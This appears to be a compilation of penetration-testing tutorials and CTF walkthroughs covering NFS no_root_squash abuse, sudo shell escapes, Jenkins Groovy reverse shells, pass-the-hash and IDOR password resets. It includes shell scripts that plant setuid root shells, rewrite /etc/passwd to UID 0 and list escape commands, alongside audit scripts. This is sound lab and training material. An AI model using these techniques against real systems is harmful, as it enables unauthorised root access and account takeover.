Linux Privilege Escalation using Misconfigured NFS

After solving several OSCP-style challenges we decided to write up the various methods used for Linux privilege escalation, which may help readers in their penetration testing projects. In this article we will learn how to exploit a misconfigured NFS share to gain root access on a remote host.

Table of contents

Introduction of NFS

Misconfigured NFS Lab setup

Scanning NFS shares

  • Nmap script
  • showmount

Exploiting NFS server for Privilege Escalation via:

  • Bash file
  • C program file
  • Nano/vi
      • Obtain shadow file
      • Obtain passwd file
      • Obtain sudoers file

Let’s Start!!

Network File System (NFS): NFS lets a user on a client machine mount files or directories shared by a server over the network and use them as if they were local. NFS uses Remote Procedure Calls (RPC) to route requests between clients and servers; the NFS service itself listens on TCP/UDP port 2049, and NFSv3 additionally relies on the RPC portmapper (rpcbind, port 111) and mountd.

Misconfigured NFS Lab setup

Basically, three core configuration files (/etc/exports, /etc/hosts.allow and /etc/hosts.deny) are involved in setting up an NFS server, but to build a deliberately weak NFS server we only need /etc/exports.

Install the NFS server package for your distribution (nfs-kernel-server on Debian/Ubuntu) and open /etc/exports for editing.

The /etc/exports file holds one record for each directory you want to share with machines on the network. Each record describes how one directory is shared and to whom.

Each record uses the following syntax:

 Directory         Host-IP(Option-list)

The options define what privileges the listed host has over the shared directory. Note that there must be no space between the host and the opening parenthesis: a record such as /home 192.168.1.10 (rw) exports /home to 192.168.1.10 with default options and, separately, to every host with rw, which is a common accidental misconfiguration.

  • rw: Permit clients both read and write access to the shared directory.
  • ro: Permit clients read-only access to the shared directory (the default).
  • root_squash: Map requests made by uid 0 on the client to the anonymous user (uid 65534, nobody or nfsnobody depending on the distribution), so that root on a client is an unprivileged user on the server. This is the default.
  • no_root_squash: Let root on the client act as root on the server: files it creates are owned by root and it can set the setuid bit on them. This has serious security implications, as shown below.
  • async: Speeds up transfers but risks data loss, because the server replies to the client before the write has reached stable storage.
  • sync: The inverse of async: the server replies only after the data has been committed to stable storage.

Hopefully it is now clear how to configure /etc/exports with these options. An NFS server is considered weak or misconfigured when it contains a record that exports a directory with the rw option, keeps root on the client as root on the server (no_root_squash) and uses * in the host field, which accepts connections from any machine.

The record in our lab exports /home in exactly that way: read/write, root on the client remains root, and the * host field allows any machine to mount it. After editing the file, re-export the shares with exportfs -ra or restart the NFS server.
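As an added example (not code from the article), here is a small shell audit for the kind of record described above. It reads an /etc/exports file and flags host entries that disable root squashing or give every host write access; the constructed sample also contains the corrected record and the "space before the parenthesis" mistake for comparison. File contents and paths are constructed for illustration.

```shell
#!/usr/bin/env bash
# Added example (not code from the article): audit an /etc/exports file for
# the misconfiguration exploited below. File contents are constructed.
set -euo pipefail

# Constructed /etc/exports: the article's weak record followed by two safer
# ones, plus the "space before the parenthesis" mistake for comparison.
SAMPLE_EXPORTS='# weak: any host, writable, client root stays root
/home *(rw,no_root_squash)
# safer: one subnet, root mapped to nobody, synchronous writes
/home 192.168.1.0/24(rw,sync,root_squash)
# read-only to everyone is still a data leak but not a root shell
/srv/pub *(ro,sync)
# mistake: the space makes (rw) apply to every host, not to the listed one
/srv/backup 192.168.1.10 (rw)
'

# Read an exports file on stdin and print "path host reason" for each host
# entry that disables root squashing or grants write access to every host.
audit_exports() {
  awk '
    /^[[:space:]]*(#|$)/ { next }                 # comments and blank lines
    {
      path = $1
      for (i = 2; i <= NF; i++) {
        host = $i; opts = ""
        if (match(host, /\(.*\)/)) {              # split host(opt,opt,...)
          opts = substr(host, RSTART + 1, RLENGTH - 2)
          host = substr(host, 1, RSTART - 1)
        }
        if (host == "") host = "*"                # bare "(opts)" means everyone
        n = split(opts, o, ",")
        squash_off = 0; writable = 0
        for (j = 1; j <= n; j++) {
          if (o[j] == "no_root_squash") squash_off = 1
          if (o[j] == "rw") writable = 1
        }
        if (squash_off) print path, host, "no_root_squash"
        if (host == "*" && writable) print path, host, "world_writable"
      }
    }'
}

# Number of weak host entries found; 0 means nothing to exploit this way.
count_weak_exports() { audit_exports | wc -l | tr -d ' '; }

printf '%s' "$SAMPLE_EXPORTS" | audit_exports
```

On a real server run it as `audit_exports < /etc/exports`; on the sample it reports the /home record twice (no_root_squash and world_writable) and the /srv/backup record once, because the stray space turned (rw) into a world-wide export.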

Scanning NFS shares

Nmap

Nmap's NSE scripts can enumerate NFS on the target network: if port 2049 is open, the nfs-showmount script lists the exported directories (for example nmap -p 111,2049 --script nfs-showmount against the target).

The script performs the same RPC query as showmount -e, and here we can clearly see that /home is exported to *, that is, to everyone on the network.

Showmount

The same thing can be done manually with showmount -e <target-IP>, which requires the nfs-common package on your local machine (apt install nfs-common on Debian/Ubuntu).

Exploiting NFS server for Privilege Escalation

Bash file

Now, as root on your local machine, mount the share and plant a setuid shell in it.

The sequence is: create a folder /tmp/raj, mount the shared directory /home on /tmp/raj, copy /bin/bash into the share and set the setuid bit on the copy. Because the export uses no_root_squash, the copy is owned by root on the server and the setuid bit is honoured there. One caveat: bash is dynamically linked, so the copy must match the target's architecture and libc. If it does not, copy the target's own /bin/bash into the share from your low-privileged session and, from the attacker side, chown it to root and set the bit on that copy instead.

Use df -h to confirm that the share is mounted and to see how much free space it has.

First you need to compromise the target system and then move on to the privilege escalation phase. Suppose you have logged in to the victim's machine through SSH as an unprivileged user. Since /home is the shared directory, move into it and run the planted copy with the -p flag (./bash -p): without -p, bash drops its effective UID back to the real UID and you would not get root.

So this was the first method to obtain root with the help of a setuid /bin/bash when the NFS server is weakly configured.
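The attacker-side procedure, written out as an added shell example that is not the article's own code. It parses showmount -e output for exports open to everyone, performs the mount, copy and chmod steps, and checks that the planted file really is root-owned and setuid, which is how you notice an export that has root_squash after all. The target address, share and mount point are assumptions; the showmount output is constructed for the dry run, and plant_suid_shell only runs when the script is invoked with the argument plant.

```shell
#!/usr/bin/env bash
# Added example, not code from the article: the attacker-side half of the
# bash method. TARGET, SHARE and MNT are assumptions; run plant_suid_shell
# as root on the attacking box with nfs-common installed.
set -euo pipefail

TARGET="${TARGET:-192.168.1.30}"   # assumed NFS server address
SHARE="${SHARE:-/home}"            # export found with showmount -e
MNT="${MNT:-/tmp/raj}"             # local mount point, as in the article

# From `showmount -e` output on stdin, print exports whose host field is "*".
world_exports() { awk 'NR > 1 && $2 == "*" { print $1 }'; }

# True if an octal mode string (as printed by `stat -c %a`) has the setuid bit.
mode_has_setuid() { [ "$((8#$1 & 8#4000))" -ne 0 ]; }

# True if FILE is owned by uid 0 and setuid: what "-rwsr-xr-x root" means in ls.
is_suid_root() {
  local mode owner
  mode=$(stat -c '%a' "$1")
  owner=$(stat -c '%u' "$1")
  [ "$owner" -eq 0 ] && mode_has_setuid "$mode"
}

# Mount the export as local root, drop a setuid copy of bash into it and
# verify. no_root_squash is what makes the copy root-owned on the server.
plant_suid_shell() {
  mkdir -p "$MNT"
  mount -t nfs "$TARGET:$SHARE" "$MNT"
  cp /bin/bash "$MNT/bash"          # must match the target's arch and libc
  chmod u+s "$MNT/bash"
  if is_suid_root "$MNT/bash"; then
    echo "planted $MNT/bash; on the target run: cd $SHARE && ./bash -p"
  else
    echo "share is not honouring root: export probably has root_squash" >&2
    return 1
  fi
}

# Constructed showmount -e output for a dry run without a target.
SAMPLE_SHOWMOUNT='Export list for 192.168.1.30:
/home *
/srv/backup 192.168.1.0/24'

printf '%s\n' "$SAMPLE_SHOWMOUNT" | world_exports
if [ "${1:-}" = "plant" ]; then plant_suid_shell; fi
```

The ownership check matters: with root_squash in effect the copy lands owned by nobody, the setuid bit is harmless, and the target-side ./bash -p simply gives you your own shell back.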

C Program

Similarly, we can use a small C program for root privilege escalation: it calls setuid(0) and setgid(0) and then executes /bin/bash. We generated such a program, copied it into /tmp/raj, compiled it there with gcc (so that the binary matches the target's architecture) and set the setuid bit as done above.

Now repeat the above process on the target and run the compiled file to obtain a root shell. Because the program sets the real and effective UID to 0 itself, no -p flag is needed this time.

So this was the second method to obtain root, a setuid C wrapper that launches /bin/bash, when the NFS server is misconfigured.

Nano/Vi

Nano and vi are among the most dangerous applications for privilege escalation if they are exposed with root privileges, directly or indirectly. In our case no editor is shared directly, but through the writable share we can make any program setuid root, so we copy nano into the share and set the setuid bit on it.

Follow the steps below:

Since we have set the setuid bit on nano, once we have compromised the target's machine we can escalate to root through several techniques; the first is to open /etc/shadow with the setuid nano.

Running the setuid nano on /etc/shadow opens the file, from where you can copy the password hash of any user.

Here we copied the hash of the user raj into a text file saved as shadow, then used John the Ripper to crack it.

Awesome!!! John reports that raj has the password 123. Now you can either log in as raj and check its privileges or follow the next step.

Passwd file

Now we know raj's password but we are not sure whether raj has root privileges, so we edit /etc/passwd with the setuid nano and set raj's UID and GID (the third and fourth fields) to 0, which makes raj a root-equivalent account. Simply adding raj to the root group would not have the same effect.

Open /etc/passwd with the setuid nano and make the change.

Now use su to switch to raj and enter the cracked password; the shell you get runs as UID 0.

Great!!! This was another way to get root access on the target's machine.
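An added shell example, not from the article, showing the same /etc/passwd change as an awk rewrite and the checks that expose it afterwards: every account with UID 0, and every account that carries a hash (or nothing) in the password field instead of an x. The sample passwd lines are constructed.

```shell
#!/usr/bin/env bash
# Added example, not from the article: the passwd edit made above as an awk
# rewrite, plus the checks that reveal it afterwards. Sample file constructed.
set -euo pipefail

SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
raj:x:1000:1000:raj,,,:/home/raj:/bin/bash
ignite:x:1001:1001::/home/ignite:/bin/bash
backdoor:$1$zz$p0wned:1002:1002::/tmp:/bin/sh'

# Attacker side: rewrite USER's uid and gid fields to 0 (what the setuid nano
# edit does by hand). Reads passwd on stdin, writes the modified file.
promote_to_uid0() {
  awk -F: -v u="$1" 'BEGIN { OFS = ":" } $1 == u { $3 = 0; $4 = 0 } { print }'
}

# Defender / post-exploitation checks over a passwd file on stdin.
# Every root-equivalent login, whatever its name.
uid0_accounts()  { awk -F: '$3 == 0 { print $1 }'; }
# Accounts whose hash lives in passwd (world-readable, crackable offline)
# or whose password field is empty, instead of the usual x for /etc/shadow.
hash_in_passwd() { awk -F: '$2 != "x" && $2 != "*" { print $1 }'; }

printf '%s\n' "$SAMPLE_PASSWD" | promote_to_uid0 raj | uid0_accounts
printf '%s\n' "$SAMPLE_PASSWD" | hash_in_passwd
```

On a live system `uid0_accounts < /etc/passwd` should print only root; anything else is either an administrator's shortcut or exactly the backdoor shown above.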

Sudoers file

We can also escalate to root by editing the sudoers file and granting ALL privileges to our non-root user (ignite).

Open /etc/sudoers with the setuid nano and add a line of the form ignite ALL=(ALL:ALL) ALL. Be careful with the syntax: sudo refuses to run at all if the file contains a parse error, so validate it with visudo -c where possible.

Now run sudo bash to get a root shell.

Conclusion: Thus we saw various approaches to escalating to root when port 2049 is open for NFS and the server is weakly configured. For practice you can play with ORCUS, a vulnerable lab from VulnHub, and read the walkthrough linked here.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Linux Privilege Escalation using Sudo Rights

In our previous articles we discussed Linux privilege escalation using SUID binaries and the /etc/passwd file; today we are posting another method, Linux privilege escalation using the sudoers file. While solving CTF challenges, for privilege escalation we always check whether the current user can run any file or command as root by executing sudo -l. You can read our previous article where we applied this trick for privilege escalation.

Let’s Start with Theoretical Concept!!

In Linux/Unix, the sudoers file in /etc is the configuration file for sudo rights. We all know the power of the sudo command; the name stands for "superuser do", i.e. carry out a task with root privileges. The sudoers file is where the users and groups that are allowed to run some or all commands as root (or as another user) are listed. Take a look at the following image.

When you run a command with sudo, sudo looks the invoking user (and the groups it belongs to) up in the sudoers file and, on most distributions, in the files under /etc/sudoers.d. If no rule matches, the command is refused and the attempt is logged. The default rule for root, root ALL=(ALL:ALL) ALL, means that root may run commands from ALL hosts, acting as ALL users and ALL groups, and may run ALL commands.

Sudoer File Syntax

 If you (root user) wish to grant sudo right to any particular user then type visudo command which will open the sudoers file for editing. Under “user privilege specification” you will observe default root permission “root ALL=(ALL:ALL) ALL” BUT in actual, there is Tag option also available which is optional, as explained below in the following image.

Consider the given example where we want to assign sudo rights for user:raaz to access the terminal and run copy command with root privilege. Here NOPASSWD tag that means no password will be requested for the user.

NOTE:

  1. (ALL:ALL) can also be written as (ALL).
  2. If you find (root) in place of (ALL:ALL), the user can run the command only as root.
  3. If no user/group is given in parentheses, sudo defaults to running the command as root.

Let’s Begin!!

Let's get into the details through practical work. First, create a user who is not a member of the sudo group. Here we have added the user "raaz", whose UID is 1002 and GID is 1002; hence raaz is a non-root user.

Traditional Method to assign Root Privilege 

If the system administrator wants to give user raaz ALL permissions, he can add raaz under the User Privilege Specification section as shown below.

Spawn Root Access

On the other hand, start your attacking machine, first compromise the target system and then move to the privilege escalation phase. Suppose you have logged in to the victim's machine through SSH and want to know the sudo rights of the current user; then execute sudo -l.

In the traditional method the PASSWD tag is in effect, so the user's own password is requested; this can be switched off with the NOPASSWD tag. The highlighted text indicates that the current user is authorised to run all commands. Therefore we obtained root access by running a shell through sudo (for example sudo bash).

Default Method to assign Root Privilege 

If the system administrator wants to let user raaz run all commands and programs as root, he can add raaz under the User Privilege Specification section as shown below.

Here too the default PASSWD tag is in effect, so the user's own password is requested.

Spawn Root Access

Again compromise the target system, move on to the privilege escalation stage as above and execute the command below to view the sudo rights of the current user.

sudo -l

Here you can see the highlighted text, which shows that user raaz can run all commands as root. Therefore we can obtain root access by performing the steps below.

Note: both of the above methods ask for the user's own password when sudo -l is executed, because the PASSWD tag is in effect by default.

Allow Root Privilege to Binary commands

Sometimes a user is authorised to run only particular binaries, such as /bin/cp, /bin/cat or /usr/bin/find. Permissions of this type can still lead to root access when the binary can execute other commands or write arbitrary files, and they are set up with the following steps.

NOTE: Here the NOPASSWD tag means that no password will be requested from the user, including when running sudo -l.

Spawn Root Access using Find Command

Again compromise the victim's system, move on to the privilege escalation phase and execute the command below to view the sudo rights.

sudo -l

At this point you can notice that the highlighted text indicates that user raaz can run find as root. Because find can run arbitrary commands through its -exec action, we got root access by executing the commands below.

Allow Root Privilege to Binary Programs

Sometimes an admin assigns delicate rights to a particular user to run programs that let the user edit any system file, such as /etc/passwd. There are certain programs that lead to privilege escalation when a user is authorised to run them as root. In the command below we assigned sudo rights for the following programs, which can then be run as root.

Spawn shell using Perl one-liner

In the privilege escalation phase, execute the command below to view the sudo rights.

Now you can observe that the highlighted text shows that user raaz can run Perl programs or scripts as root. Therefore we got root access by executing a Perl one-liner that execs a shell, and confirmed it with:

id

 

Spawn shell using Python one-liner

After compromising the target system, move on to the privilege escalation phase as above and execute the command below.

sudo -l

At this point you can perceive that the highlighted text indicates that user raaz can run Python programs or scripts as root. Thus we acquired root access by executing a Python one-liner that spawns a shell.

Spawn shell using Less Command

For the privilege escalation phase, execute the command below.

sudo -l

Here you can observe that the highlighted text indicates that user raaz can run less as root. Hence we obtained root access as follows.

less opens the requested system file for viewing; to spawn a root shell from inside it, type !bash as shown below and hit enter.

You will get root access as shown in the image below.

Spawn shell using AWK one-liner

After compromising the target system, move on to the privilege escalation phase as above and execute the command below.

sudo -l

At this phase you can notice that the highlighted text shows that user raaz can run AWK programs or scripts as root. Therefore we obtained root access with an AWK one-liner whose BEGIN block calls system() with a shell.

Spawn shell using Man Command (Manual page)

For privilege escalation, execute the command below.

sudo -l

Here you can observe that the highlighted text indicates that user raaz can run man as root. Therefore we got root access as follows.

man displays the requested manual page through its pager; to spawn a root shell, type !bash as presented below and hit enter, and you get root access as with less.

Spawn shell using Vi-editor (Visual editor)

After compromising the target system, move on to the privilege escalation phase as above and execute the command below.

sudo -l

Here you can observe that the highlighted text indicates that user raaz can run vi as root. Consequently we got root access as follows.

sudo vi

This opens vi as root; to spawn a root shell from inside it, type :!bash (the colon enters command-line mode) as shown below and hit enter, and you get root access as with less.

You will get root access as shown in the image below.

NOTE: sudo permission for pagers and editors such as less, more, man, vi and nano is very dangerous: they let the user read and edit system files as root and, through their shell escapes, hand out a root shell directly.
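As an added example that is not the article's code, the following shell script parses sudoers user specifications of the kind granted to raaz in this article, flags the commands that hand out a root shell and prints the escape each one needs. The sudoers fragment is constructed; the list of escapes covers the binaries used above and can be extended.

```shell
#!/usr/bin/env bash
# Added example, not the article's code: parse sudoers user specifications
# like the ones granted to raaz above, flag commands that hand out a root shell
# and print the escape each one needs. The sudoers fragment is constructed.
set -euo pipefail

SAMPLE_SUDOERS='# constructed /etc/sudoers fragment
Defaults env_reset
root    ALL=(ALL:ALL) ALL
raaz    ALL=(ALL) NOPASSWD: /usr/bin/find, /usr/bin/perl, /usr/bin/python3
raaz    ALL=(root) /usr/bin/less, /usr/bin/vi, /usr/bin/man, /usr/bin/awk
ignite  ALL=(ALL:ALL) ALL
ops     ALL=(root) NOPASSWD: /bin/systemctl restart nginx'

# One "user runas tag command" line per command in each user specification.
parse_sudoers() {
  awk '
    /^[[:space:]]*(#|$)/ || /^Defaults/ { next }
    {
      user = $1
      rest = $0
      sub(/^[^[:space:]]+[[:space:]]+/, "", rest)      # drop the user field
      sub(/^[^=]*=[[:space:]]*/, "", rest)             # drop "host ="
      runas = "root"                                   # default when no (...) given
      if (match(rest, /^\([^)]*\)/)) {
        runas = substr(rest, 2, RLENGTH - 2)
        rest = substr(rest, RLENGTH + 1)
      }
      tag = "PASSWD"
      if (match(rest, /NOPASSWD:/)) {
        tag = "NOPASSWD"
        rest = substr(rest, RSTART + RLENGTH)
      }
      n = split(rest, cmds, ",")
      for (i = 1; i <= n; i++) {
        c = cmds[i]
        gsub(/^[[:space:]]+|[[:space:]]+$/, "", c)
        print user, runas, tag, c
      }
    }'
}

# The shell escape for a binary, as typed by the low-privileged user.
escape_for() {
  case "$1" in
    ALL)            echo 'sudo bash' ;;
    find)           echo 'sudo find /etc/passwd -exec /bin/bash \; -quit' ;;
    perl)           echo "sudo perl -e 'exec \"/bin/bash\";'" ;;
    python|python3) echo "sudo $1 -c 'import os; os.execl(\"/bin/bash\", \"bash\")'" ;;
    awk)            echo "sudo awk 'BEGIN { system(\"/bin/bash\") }'" ;;
    less)           echo 'sudo less /etc/profile   # then type !bash' ;;
    man)            echo 'sudo man man   # then type !bash' ;;
    vi|vim)         echo "sudo $1   # then type :!bash" ;;
    *)              return 1 ;;
  esac
}

# Print every rule that yields a root shell, with the escape to use.
flag_shell_escapes() {
  parse_sudoers | while read -r user runas tag cmd; do
    base=${cmd%% *}; base=${base##*/}
    if esc=$(escape_for "$base"); then
      echo "$user ($tag, as $runas): $esc"
    fi
  done
}

count_escapes() { flag_shell_escapes | wc -l | tr -d ' '; }

printf '%s\n' "$SAMPLE_SUDOERS" | flag_shell_escapes
```

The ops rule (a single systemctl invocation with fixed arguments) is the shape of a rule that does not give a shell; everything granted to raaz does, whether or not a password is asked for.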

 

Allow Root Privilege to Shell Script

There is a good chance of finding a script that the system or a program calls; it can be a Bash, PHP, Python or C program. Suppose you (the system admin) want to give sudo permission for a script that provides a bash shell on execution.

For example, we have some scripts that provide a root terminal when executed. In the image below you can observe that we wrote three programs for obtaining a bash shell in different programming languages and saved all three files, asroot.py, asroot.sh and asroot.c (compiled to the file shell), inside bin/script.

NOTE: While solving OSCP challenges you will find that the author sometimes hides a script, meant for a kernel exploit or a root shell, and grants a particular user sudo permission to execute it. Note also that a script run through sudo is only as safe as every file it reads or executes: if raaz can edit the script itself, or any interpreter or library it calls, the sudo rule is equivalent to ALL.

Now allow raaz to run all of the above scripts as root by editing the sudoers file with the following command.

 

Spawn root shell by Executing Bash script

For the privilege escalation phase, execute the command below.

sudo -l

The highlighted text indicates that user raaz can run asroot.sh as root. Therefore we got root access by running the asroot.sh script.

 

Spawn root shell by Executing Python script

Execute the command below in the privilege escalation phase to view the sudo rights.

sudo -l

This time the highlighted text shows that user raaz can run asroot.py as root. Therefore we acquired root access by executing that script.

Spawn root shell by Executing C Language script

After compromising the target system, move on to privilege escalation and execute the command below.

sudo -l

Here you can perceive that the highlighted text indicates that user raaz can run shell (the compiled asroot.c) as root. So we obtained root access by executing that binary.

Today we demonstrated various methods to spawn a root terminal on the victim's machine when a user is listed in the sudoers file with root permissions.

HAPPY HACKING!!!!


Hack the Box Challenge: Jeeves Walkthrough

Hello Friends!! Today we are going to solve another CTF challenge, "Jeeves". This VM is developed by Hack the Box; Jeeves is a retired lab and there are multiple ways to break into it. In this lab we escalated to SYSTEM privileges in three different ways, and for completing the challenge we took help from our Tally (Hack the Box) write-up.

Level: Medium

Task: Find the user.txt and root.txt in the vulnerable Lab.

Let’s Begin!!

As these labs are only available online they have static IPs. The Jeeves lab has IP 10.10.10.63.

Now, as always let’s begin our hacking with the port enumeration.

From the result we found that ports 22, 80, 135, 445 and 50000 are open; moreover, ports 135 and 445 point towards a Windows operating system.

Subsequently we checked the web service first by opening the target IP in a browser, which showed an "Ask Jeeves search engine" page. We tried searching for a website such as google.com and a new page came up, which turned out to be a fake error page.

Port 50000 in a web browser gives an HTTP 404 error page.

Then we decided to use OWASP DirBuster for a directory brute-force attack.

From its result we found several directories, but we went with /askjeeves for further work.

When we browsed to 10.10.10.63:50000/askjeeves it led us to a Jenkins dashboard. Ahhh!! It was a WOW moment for us, because we know there are many ways to exploit Jenkins. Thus we moved into "Manage Jenkins", as it is the spine of the installation and abusing it is quite straightforward.

There were many options, but we were interested in the Script Console, because Jenkins has a Groovy script console that allows anyone with access to it to execute arbitrary Groovy code inside the Jenkins master runtime, i.e. as the account the Jenkins service runs under.

We found a Java reverse shell for the Groovy console on GitHub, so we copied the code and modified its listening host and port to match our setup.

Then we started a Netcat listener and ran the above Groovy script to receive the victim's reverse connection. From the image below you can observe that we obtained a shell on the victim's machine.

As we love the meterpreter shell, we loaded the Metasploit framework and used a module that generates a PowerShell one-liner for a reverse connection, executing the commands below.

Copy the highlighted powershell.exe text and paste it inside the CMD shell as shown in the next image.

Paste the above command here, in the netcat session.

You will get a meterpreter session on the victim's machine in your Metasploit framework; after that, the task is finished by grabbing the user.txt and root.txt files. Next, type the following:

getuid

But at this point we did not have NT AUTHORITY\SYSTEM permissions. We did, however, know the techniques we used in the Tally CTF for gaining NT AUTHORITY\SYSTEM.

Therefore, taking help from our previous Tally article, we executed the commands below and successfully gained NT AUTHORITY\SYSTEM.

Let me tell you that we have solved many Hack the Box CTF challenges, some of them built on Windows, and we always grabbed user.txt from inside a folder owned by some user and root.txt from inside the Administrator folder; both of these folders live under C:\Users.

Similarly, you can observe the same thing here, and you may have guessed my intention from the words above. So let's grab user.txt first, from inside \kohsuke\Desktop.

COOL!!! We have captured the 1st flag.

Then we went for root.txt, BUT it was a little tricky to get, because the author hid the flag in an NTFS Alternate Data Stream (ADS) attached to another file, so it does not show up in a normal directory listing. To find it, run dir with the /R flag, which lists the streams attached to each file, and then read the stream by name (file:stream) with more or with PowerShell's Get-Content -Stream.

Hurray!! The /R flag of dir disclosed the root.txt stream and we successfully completed the 2nd task.

2nd Method

When you have a fresh meterpreter session 1, move into the Documents directory and download the CEH.kdbx file (a KeePass database). Here too we took help from our previous article, Tally.

Now run the keepass2john Python script, which extracts a hashcat/John-crackable hash from KeePass 1.x/2.x databases.

Next we used John the Ripper to crack the master key from the extracted hash, with the following command.

So we found the master key "moonshine1". KeePass 2 is a password manager that stores credentials in an encrypted database; to open the file you need to install it (keepass2) using the following command.

After installing, run the command below and enter "moonshine1" as the master key.

Inside CEH we found many credentials; we copied all the passwords from here, pasted them into a text file and got a few passwords and one NTLM hash value (in LM:NTLM form): aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

Awesome!!! With that hash we got meterpreter session 2 with proper NT AUTHORITY\SYSTEM permissions via pass-the-hash (psexec); now use the above steps to get the root.txt file.

Note: we rebooted the target VM before starting the 2nd method.

3rd Method

When you have a fresh meterpreter session 2 (via psexec), execute the following command to enable the Remote Desktop service on the victim's machine.

Now we have the victim's command prompt with administrator privileges, so we can change the Administrator password directly with the net user command. Note that resetting an account password is noisy and destructive; on a real engagement you would use the hash you already have rather than change the Administrator password.

net user administrator 123

Now open a new terminal in your Kali Linux and run rdesktop 10.10.10.63 to access the victim's Remote Desktop service, then log in with the credentials administrator:123.

BOOOOOM!!! Look at the victim's screen; now let's grab the root flag and enjoy GUI mode.

Finding user.txt is quite easy, you can try it on your own. To grab the root.txt flag, open the command prompt and run the dir /R and stream-reading commands as done above.

 Enjoy Hacking!!!!


Hack the Trollcave VM (Boot to Root)

Hello friends! Today we are going to take on another CTF challenge known as Trollcave. Credit for making this VM goes to "David Yates"; it is another boot-to-root challenge in which our goal is to gain root access and capture the flag. You can download this VM from here.

Penetrating Methodology

  • Network scanning (Nmap, netdiscover)
  • Information gathering
  • Examining the web application framework (Ruby on Rails)
  • Enumerating user IDs 1 to 17 to find King's page, the superadmin account
  • Finding the default Rails route for password reset (Google)
  • Exploiting IDOR to reset the password for King's account
  • Logging in to the superadmin console (King's account)
  • Exploring the file manager tab and enabling uploads
  • Generating an SSH RSA key pair without a passphrase
  • Uploading the public key as authorized_keys via path traversal
  • Getting a tty shell via SSH login
  • Kernel privilege escalation (searchsploit)
  • Encoding the exploit with base64
  • Transferring it to the victim's machine and decoding it
  • Running the kernel exploit and gaining root access
  • Capturing the flag and finishing the challenge

Let’s Breach!!!

Let's start by finding the IP of the VM (here it is 192.168.1.124, but you will have to find your own):

netdiscover

Now let's move on to enumeration, identifying the running services and open ports on the victim's machine with the most popular tool, Nmap.

Awesome!! Nmap dumped the details of the services running on open ports 22 and 80.

Knowing that port 80 is open on the victim, I preferred to explore its IP in a browser. At first glance we saw three tabs: Home, Login and Register.

Then we scrolled down the page, looked at the Ruby gem logo and found that this site is built on Ruby on Rails. On the right side we saw two categories, Online users and Newest users; when we clicked on "xer", a new page opened.

From its URL we perceived that user xer has user ID 17, and hence there must be other users with IDs between 1 and 17.

So we manually replaced ID 17 with ID 1 and found King's page, which belongs to the superadmin account.

On the home page we read a post about password reset by coderguy; since the site runs on Rails, we searched Google for the default password-reset route and found it. So we browsed to http://192.168.1.124/password_resets/new and obtained a password reset form. First we tried to reset the superadmin password but failed, BUT we successfully got a reset link for xer.

Yeah!! It was pretty good to see a link for resetting xer's password, so we copied that link.

 

We pasted the copied link into the URL bar, swapped name=xer for name=king as shown below and entered a new password for the superadmin (king). The application trusts the user name in the link without checking that the reset token was issued for that user, which is an Insecure Direct Object Reference (IDOR).

Well!!! On submitting the URL it gave the message "password reset successfully", and then we logged in to the superadmin account.

Yippee!!! Finally we logged in as superadmin and accessed the admin console; we saw many tabs and clicked on File Manager.

 

Here we saw an option to enable file uploads, which we enabled so that we could upload a backdoor whenever needed.

We started by uploading a PHP backdoor but it failed; similarly we tried many other backdoors, such as Ruby, C shell and more, and failed each time. After many attempts we succeeded with an SSH public key instead.

To do so, follow the steps below:

Here we generated an SSH RSA key pair named rails without a passphrase, put rails.pub into a file named authorized_keys and set permission 600 on it (sshd's StrictModes rejects an authorized_keys file that other users can write).

Then we uploaded authorized_keys and edited the destination path manually to ../../../../../../home/rails/.ssh/authorized_keys: the file manager does not sanitise the path, so the traversal drops our key into the rails user's .ssh directory.

After uploading the key it was time to connect to the target over SSH as user rails with the rails private key.

Awesome!! From the image below you can observe the target machine's tty shell.

Then we ran lsb_release -a to identify the distribution and found Ubuntu 16.04 (lsb_release reports the release, not the kernel; use uname -r for the kernel version and check it against the range the exploit claims to cover). With searchsploit we then found the kernel exploit 44298.c for local privilege escalation.

At that point we copied the exploit to the Desktop and compiled it. It was not possible to transfer the compiled file directly, so we encoded it with base64 and moved it as text; you can use the commands below to do the same. Note that a binary built on Kali only runs on the target if the architecture and libc match; if gcc is available on the target it is safer to transfer the .c source and compile it there.

We copied the base64-encoded output, moved to the target's terminal, created an empty file exploit.base64 with nano and pasted the copied text into it.

Then we decoded it into a new file named rootshell, made the decoded file executable and finally ran rootshell to get root privileges.
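An added shell example, not from the write-up, for the base64 transfer described above, with the integrity check that the write-up does not show. File names are assumptions and the blob is random data rather than a real exploit.

```shell
#!/usr/bin/env bash
# Added example, not from the write-up: move a file onto a box that has no
# file-transfer tools by pasting base64 into its terminal, and verify the copy
# before running it. File names are assumptions.
set -euo pipefail

# Attacker side: base64 wrapped at 76 columns pastes cleanly into nano or a
# heredoc; the hash lets you confirm the target-side copy is intact.
encode_for_paste() { base64 -w 76 "$1"; }
digest() { sha256sum "$1" | cut -d' ' -f1; }

# Target side: paste the blob into exploit.base64 (e.g. with nano), then
# decode it into an executable file with `decode_paste rootshell < exploit.base64`.
decode_paste() { base64 -d > "$1" && chmod 700 "$1"; }

# Round trip on a constructed 4 KiB random blob (not a real exploit): returns
# 0 when the decoded file's digest matches the original's.
roundtrip_ok() {
  local src dst rc
  src=$(mktemp); dst=$(mktemp)
  head -c 4096 /dev/urandom > "$src"
  encode_for_paste "$src" | decode_paste "$dst"
  if [ "$(digest "$src")" = "$(digest "$dst")" ]; then rc=0; else rc=1; fi
  rm -f "$src" "$dst"
  return "$rc"
}

if roundtrip_ok; then echo "decoded copy matches"; else echo "copy corrupted" >&2; exit 1; fi
```

On a real transfer run digest on both sides and compare before executing anything: a terminal that wraps or drops characters produces a file that decodes without error but segfaults or, worse, runs partially.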

BINGO!!!! We got the root flag!!!

